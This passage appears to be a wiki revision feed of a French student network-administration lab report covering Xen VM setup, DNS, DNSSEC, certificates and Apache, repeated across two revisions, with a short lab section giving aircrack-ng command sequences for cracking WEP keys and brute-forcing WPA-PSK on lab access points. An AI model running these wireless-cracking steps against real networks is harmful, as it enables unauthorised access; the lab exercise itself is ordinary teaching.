 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57743</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57743"/>
				<updated>2022-01-10T16:38:31Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Sécurisation de serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
